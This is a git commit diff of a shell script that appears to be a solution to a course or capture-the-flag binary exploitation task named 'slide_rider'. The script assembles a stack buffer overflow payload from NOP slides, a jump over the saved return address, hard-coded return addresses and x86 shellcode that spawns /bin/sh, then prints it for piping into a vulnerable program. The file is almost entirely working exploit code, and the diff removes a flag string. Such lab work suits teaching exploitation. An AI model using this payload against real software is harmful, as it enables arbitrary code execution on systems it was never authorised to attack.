[Assignment-6] Task 6b solution.sh

2024-06-23 18:05:53 +02:00 · 2024-06-23 18:05:53 +02:00 · fa4873f427
commit fa4873f427
parent 3f475f91f3
1 changed files with 10 additions and 14 deletions
--- a/2/slide_rider/solution.sh
+++ b/2/slide_rider/solution.sh
@ -1,16 +1,12 @@
-#!/bin/bash
+#!/usr/bin/env sh
-# sources: https://hg8.sh/posts/binary-exploitation/buffer-overflow-code-execution-by-shellcode-injection/
+# slide for buffer size 20 + 2 bytes of saved ebp
 SLIDE_1=$(printf "\\\\x90%.0s" $(seq 1 22))
 # jump over the ret addr
 JMP_OVER_RET="\xeb\x04"
 RET_ADDR="\x08\xdc\xff\xff"
 # main nop slide (500 Bytes)
 SLIDE_2=$(printf "\\\\x90%.0s" $(seq 1 500))
 SHELLCODE="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
-# flag{THEY_SEE_ME_SLIDIN_THEY_HATIN}
+printf $SLIDE_1$JMP_OVER_RET$RET_ADDR$SLIDE_2$SHELLCODE
 ######### Exploit #########
 # Step 1: Fill the buffer with a candidate return address
 printf "\x0c\xd6\xff\xff%.0s" {1..30}
 # Step 2: Write a lot of NOPs to stdout as a slide for the shellcode
 printf "\x90%.0s" {1..2000}
 # Step 3: Write the provided shellcode to stdout
 printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
 ###########################